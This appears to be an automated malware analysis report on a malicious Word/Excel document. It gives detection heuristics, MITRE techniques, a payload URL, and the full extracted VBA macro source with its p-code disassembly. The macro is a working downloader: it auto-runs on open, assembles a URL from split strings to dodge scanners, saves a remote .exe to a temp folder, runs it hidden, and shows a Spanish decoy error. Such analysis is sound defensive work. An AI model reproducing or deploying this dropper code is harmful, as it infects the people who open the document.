MALICIOUS
374
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1105 Ingress Tool Transfer
T1566.001 Spearphishing Attachment
The sample contains VBA macros that attempt to download and execute a second-stage payload from the URL http://caracteresmediagroup.ma/wp-content/themes//twentyten//mmsclaro.php. The document body explicitly instructs the user to enable macros, presenting a social engineering lure to bypass security measures. The VBA script constructs the URL and filename for the payload, indicating a downloader functionality.
Heuristics 13
-
ClamAV: Doc.Downloader.Generic-6698421-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Generic-6698421-0
-
VBA macros detected medium 9 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Shell FSP, vbHide -
VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXECVBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.Matched line in script
OIREQER.Write ASDEKR.responseBody -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set ASDEKR = CreateObject(sakjdkjsadkjsad & akdjkasjdkaoaso & "." & asjdkasjdhkiass & akjsdhaksuhdkjh) -
Payload URL assembled from a Chr()/Asc() string expression (1 URL) high OLE_VBA_EXPR_DROPPER_URLA VBA macro builds its stage-2 download URL character by character from string literals concatenated with Chr()/Asc()/StrReverse() results — often nested (Chr(Asc(Chr(Asc("h")))) = "h") and split across the + and & operators, sometimes written out via Print #n, into a second-stage VBScript/PowerShell file. The URL is assembled at run time and never appears contiguously on disk, and there is no numeric array to brute-force, so a literal scan and the array recoverers both miss it. A bounded expression evaluator resolved it; surfaced as an IOC. Self-validating: only a valid host URL that is not already present verbatim in the macro is reported, so a benign macro cannot false-positive.
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Sub Workbook_Open() -
Auto_Open macro low OLE_VBA_AUTOAuto_Open macroMatched line in script
Auto_Open -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
FSP = Environ(SABKERPE) & "\" & EASREFG -
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://caracteresmediagroup.ma/wp-content/themes//twentyten//mmsclaro.php Referenced by macro
- http://ns.adobe.com/xap/1.0/Referenced by macro
- http://www.w3.org/1999/02/22-rdf-syntax-ns#Referenced by macro
- http://purl.org/dc/elements/1.1/Referenced by macro
- http://schemas.openxmlformats.org/drawingml/2006/mainReferenced by macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7562 bytes |
SHA-256: 6bc4eb7be284ba38a6f2772ef74c4dccfe1fac919caef6245e1249ca39e72a5b |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Workbook_Open()
Auto_Open
End Sub
Sub AutoOpen()
Auto_Open
End Sub
Sub Auto_Open()
h
End Sub
Sub h()
Dim adsdasaadsadsads As String
Dim aiusodhiausdghia As String
Dim aiusdhy9uehoaijs As String
Dim ads3jsdfiujhaoia As String
aiusodhiausdghia = "caracteresmediagroup.ma/wp-content/themes/"
aiusdhy9uehoaijs = "/twentyten/"
ads3jsdfiujhaoia = "/mmsclaro"
Dim laksjdsaasiodjds As String
laksjdsaasiodjds = adsdasaadsadsads + aiusodhiausdghia + aiusdhy9uehoaijs + ads3jsdfiujhaoia
Aasdsa = DERALLKE("ht" & "tp" & "://" & aiusodhiausdghia & aiusdhy9uehoaijs & ads3jsdfiujhaoia & "." & "php", "23324231432423423" & "." & "exe", "use" & "rp" & "ro" & "file", True, True)
MessageBoxExample
End Sub
Sub MessageBoxExample()
MsgBox "Este documento no es compatible con este equipo." & "Por favor intente desde otro equipo.", vbCritical, "Equipo no compatible"
End Sub
Attribute VB_Name = "Module1"
Function DERALLKE(ByVal UKERLE As String, ByVal EASREFG As String, Optional SABKERPE As String = "TMP", Optional RAD As Boolean = True, Optional RHD As Boolean = False)
On Error Resume Next
Err.Clear
Dim sakjdkjsadkjsad As String
Dim akdjkasjdkaoaso As String
Dim asjdkasjdhkiass As String
Dim akjsdhaksuhdkjh As String
akjsdhaksuhdkjh = "TTP"
asjdkasjdhkiass = "XMLH"
sakjdkjsadkjsad = "Micro"
akdjkasjdkaoaso = "soft"
Set ASDEKR = CreateObject(sakjdkjsadkjsad & akdjkasjdkaoaso & "." & asjdkasjdhkiass & akjsdhaksuhdkjh)
Dim dooaisjdoaisjo As String
Dim asdhaosidoijoa As String
dooaisjdoaisjo = "ADODB"
asdhaosidoijoa = "Stream"
Set OIREQER = CreateObject(dooaisjdoaisjo & "." & asdhaosidoijoa)
ASDEKR.Open "G" & "E" & "T", UKERLE, False
ASDEKR.send
ASDEKR.getAllResponseHeaders
FSP = Environ(SABKERPE) & "\" & EASREFG
OIREQER.Open
OIREQER.Type = 1
OIREQER.Write ASDEKR.responseBody
OIREQER.SaveToFile FSP, 2
If Err Then
DNWF = False
Else
If RAD = True Then
If RHD = True Then
Shell FSP, vbHide
Else
Shell FSP, vbNormalFocus
End If
End If
DWNF = True
End If
End Function
' Processing file: /tmp/qstore_mzryy9ml
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 5093 bytes
' Line #0:
' FuncDefn (Sub File())
' Line #1:
' ArgsCall DERALLKE 0x0000
' Line #2:
' EndSub
' Line #3:
' FuncDefn (Sub MessageBoxExample())
' Line #4:
' ArgsCall DERALLKE 0x0000
' Line #5:
' EndSub
' Line #6:
' FuncDefn (Sub DERALLKE())
' Line #7:
' ArgsCall bool 0x0000
' Line #8:
' EndSub
' Line #9:
' FuncDefn (Sub bool())
' Line #10:
' Dim
' VarDefn jsdfiujhaoia (As String)
' Line #11:
' Dim
' VarDefn laksjdsaasiodjds (As String)
' Line #12:
' Dim
' VarDefn _B_var_laksjdsaasiodjds (As String)
' Line #13:
' Dim
' VarDefn _B_var_aiusodhiausdghia (As String)
' Line #14:
' LitStr 0x002A "caracteresmediagroup.ma/wp-content/themes/"
' St laksjdsaasiodjds
' Line #15:
' LitStr 0x000B "/twentyten/"
' St _B_var_laksjdsaasiodjds
' Line #16:
' LitStr 0x0009 "/mmsclaro"
' St _B_var_aiusodhiausdghia
' Line #17:
' Dim
' VarDefn _B_var_aiusdhy9uehoaijs (As String)
' Line #18:
' Ld jsdfiujhaoia
' Ld laksjdsaasiodjds
' Add
' Ld _B_var_laksjdsaasiodjds
' Add
' Ld _B_var_aiusodhiausdghia
' Add
' St _B_var_aiusdhy9uehoaijs
' Line #19:
' LitStr 0x0002 "ht"
' LitStr 0x0002 "tp"
' Concat
' LitStr 0x0003 "://"
' Concat
' Ld laksjdsaasiodjds
' Concat
' Ld _B_var_laksjdsaasiodjds
' Concat
' Ld _B_var_aiusodhiausdghia
' Concat
' LitStr 0x0001 "."
' Concat
' LitStr 0x0003 "php"
' Concat
' LitStr 0x0011 "23324231432423423"
' LitStr 0x0001 "."
' Concat
' LitStr 0x0003 "exe"
' Concat
' LitStr 0x0003 "use"
' LitStr 0x0002 "rp"
' Concat
' LitStr 0x0002 "ro"
' Concat
' LitStr 0x0004 "file"
' Concat
' LitVarSpecial (True)
' LitVarSpecial (True)
' ArgsLd iRet 0x0005
' St akdjkasjdkaoaso
' Line #20:
' ArgsCall iRet2 0x0000
' Line #21:
' EndSub
' Line #22:
' FuncDefn (Sub iRet2())
' Line #23:
' Line #24:
' LitStr 0x0030 "Este documento no es compatible con este equipo."
' LitStr 0x0024 "Por favor intente desde otro equipo."
' Concat
' Ld Application
' LitStr 0x0014 "Equipo no compatible"
' ArgsCall strPrompt2 0x0003
' Line #25:
' EndSub
' Line #26:
' Macros/VBA/Module1 - 5412 bytes
' Line #0:
' ConstFuncExpr
' LitVarSpecial (False)
' LitVarSpecial (True)
' LitStr 0x0003 "TMP"
' FuncDefn (Function iRet(ByVal RunHide As String, ByVal Err As String, Optional Clear As String, Optional FSP As Boolean, Optional _B_var_FSP As Boolean))
' Line #1:
' OnError (Resume Next)
' Line #2:
' Ld OIREQER
' ArgsMemCall send 0x0000
' Line #3:
' Dim
' VarDefn akjsdhaksuhdkjh (As String)
' Line #4:
' Dim
' VarDefn dooaisjdoaisjo (As String)
' Line #5:
' Dim
' VarDefn id_02D0 (As String)
' Line #6:
' Dim
' VarDefn id_02D2 (As String)
' Line #7:
' LitStr 0x0003 "TTP"
' St id_02D2
' Line #8:
' LitStr 0x0004 "XMLH"
' St id_02D0
' Line #9:
' LitStr 0x0005 "Micro"
' St akjsdhaksuhdkjh
' Line #10:
' LitStr 0x0004 "soft"
' St dooaisjdoaisjo
' Line #11:
' SetStmt
' Ld akjsdhaksuhdkjh
' Ld dooaisjdoaisjo
' Concat
' LitStr 0x0001 "."
' Concat
' Ld id_02D0
' Concat
' Ld id_02D2
' Concat
' ArgsLd FullSavePath 0x0001
' Set getAllResponseHeaders
' Line #12:
' Dim
' VarDefn id_02D4 (As String)
' Line #13:
' Dim
' VarDefn id_02D6 (As String)
' Line #14:
' LitStr 0x0005 "ADODB"
' St id_02D4
' Line #15:
' LitStr 0x0006 "Stream"
' St id_02D6
' Line #16:
' SetStmt
' Ld id_02D4
' LitStr 0x0001 "."
' Concat
' Ld id_02D6
' Concat
' ArgsLd FullSavePath 0x0001
' Set Environ
' Line #17:
' LitStr 0x0001 "G"
' LitStr 0x0001 "E"
' Concat
' LitStr 0x0001 "T"
' Concat
' Ld RunHide
' LitVarSpecial (False)
' Ld getAllResponseHeaders
' ArgsMemCall Open 0x0003
' Line #18:
' Ld getAllResponseHeaders
' ArgsMemCall responseBody 0x0000
' Line #19:
' Ld getAllResponseHeaders
' ArgsMemCall SaveToFile 0x0000
' Line #20:
' Ld Clear
' ArgsLd Shell 0x0001
' LitStr 0x0001 "\"
' Concat
' Ld Err
' Concat
' St link
' Line #21:
' Ld Environ
' ArgsMemCall Open 0x0000
' Line #22:
' LitDI2 0x0001
' Ld Environ
' MemSt Type
' Line #23:
' Ld getAllResponseHeaders
' MemLd vbHide
' Ld Environ
' ArgsMemCall Xor 0x0001
' Line #24:
' Ld link
' LitDI2 0x0002
' Ld Environ
' ArgsMemCall vbNormalFocus 0x0002
' Line #25:
' Ld OIREQER
' IfBlock
' Line #26:
' LitVarSpecial (False)
' St _B_var_DNWF
' Line #27:
' ElseBlock
' Line #28:
' Ld FSP
' LitVarSpecial (True)
' Eq
' IfBlock
' Line #29:
' Ld _B_var_FSP
' LitVarSpecial (True)
' Eq
' IfBlock
' Line #30:
' Ld link
' Ld _B_var_OIREQER
' ArgsCall _B_var_ASDEKR 0x0002
' Line #31:
' ElseBlock
' Line #32:
' Ld link
' Ld _B_var_Environ
' ArgsCall _B_var_ASDEKR 0x0002
' Line #33:
' EndIfBlock
' Line #34:
' EndIfBlock
' Line #35:
' LitVarSpecial (True)
' St _B_var_DWNF
' Line #36:
' EndIfBlock
' Line #37:
' EndFunc
' Line #38:
' Line #39:
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.